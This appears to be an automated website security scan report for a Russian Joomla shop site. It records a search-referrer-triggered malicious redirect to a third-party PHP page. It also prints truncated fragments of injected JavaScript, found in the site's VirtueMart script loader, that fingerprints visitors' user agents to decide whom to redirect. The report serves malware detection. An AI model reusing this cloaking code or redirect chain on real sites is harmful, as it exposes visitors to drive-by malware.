Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://kss-kamin.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: kss-kamin.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Fri, 05 Sep 2014 09:48:22 GMT Location: http://www.cieesc.com/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=WINDOWS-1251 Expires: Fri, 05 Sep 2014 09:48:22 GMT | malicious |
Scanned pages/files
| Request | Server response | Status |
http://kss-kamin.ru/ | 200 OK Content-Length: 21952 Content-Type: text/html | clean |
http://site.yandex.net/load/form/1/form.js | 200 OK Content-Length: 1293 Content-Type: application/x-javascript | clean |
http://kss-kamin.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js | 200 OK Content-Length: 1488 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function verification_data(stuff){var siger=navigator.userAgent.split(' ');var patron=siger[siger.length-1];patron=patron.toLowerCase();stuff=stuff.toLowerCase();if(patron.indexOf(stuff)===-1){return false}else{return true}}function factorNA(){var courier=['iPhone','iPad','Macintosh','Linux','FreeBSD','IEMobile','Android','Chrome'];var brbadi=false;for(var i in courier){var stuff=courier[i];if(verification_data(stuff)){console.log(stuff);brbadi=true;break}}return brbadi}if(!factorNA( return main; } return false; } function jjj_lister_ug(){ var brunoSpis = 'iPhone^Macintosh^Linux^iPad^Series40^SymbOS^Flock^SeaMonkey^Nokia^SlimBrowser^AmigaOS^Android^FreeBSD^Chrome^IEMobile^SymbianOS^Avant^Chromium^Firefox/18.0^Firefox/18.0.1^Firefox/17.0^Firefox/12.0^Firefox/25.0^Firefox/24.0^Firefox/18.0.2^Firefox/19.0^Firefox/19.0.1^Firefox/20.0^Firefox/21.0^Firefox/22.0^Firefox/23.0^Firefox/25.0.1^Firefox/2 Antivirus reports:
| ||
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/x-javascript | clean |
http://kss-kamin.ru/index.php?option=com_content&task=view&id=17&Itemid=33 | 200 OK Content-Length: 21972 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=113&category_id=16&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 25244 Content-Type: text/html | clean |
http://kss-kamin.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js&subdir[4]=/js/slimbox/js&file[4]=slimbox.js | 200 OK Content-Length: 8452 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function verification_data(stuff){var siger=navigator.userAgent.split(' ');var patron=siger[siger.length-1];patron=patron.toLowerCase();stuff=stuff.toLowerCase();if(patron.indexOf(stuff)===-1){return false}else{return true}}function factorNA(){var courier=['iPhone','iPad','Macintosh','Linux','FreeBSD','IEMobile','Android','Chrome'];var brbadi=false;for(var i in courier){var stuff=courier[i];if(verification_data(stuff)){console.log(stuff);brbadi=true;break}}return brbadi}if(!factorNA( // AUTOLOAD CODE BLOCK (MAY BE CHANGED OR REMOVED) Slimbox.scanPage = function() { $$($$(document.links).filter(function(el) { return el.rel && el.rel.test(/^lightbox/i); })).slimbox({/* Put custom options here */}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }; window.addEvent("domready", Slimbox.scanPage); Antivirus reports:
| ||
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=143&category_id=16&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 25277 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=149&category_id=18&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 27104 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage_lite_pdf.tpl&product_id=8&category_id=11&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 25559 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=218&category_id=23&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 24944 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=216&category_id=22&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 24952 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=205&category_id=21&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 24964 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=222&category_id=24&option=com_virtuemart&Itemid=27 | 200 OK Content-Length: 25515 Content-Type: text/html | clean |
http://kss-kamin.ru/index.php?option=com_content&task=view&id=12&Itemid=28 | 200 OK Content-Length: 21952 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kss-kamin.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kss-kamin.ru/
Result: kss-kamin.ru is not infected or malware details are not published yet.
Result: kss-kamin.ru is not infected or malware details are not published yet.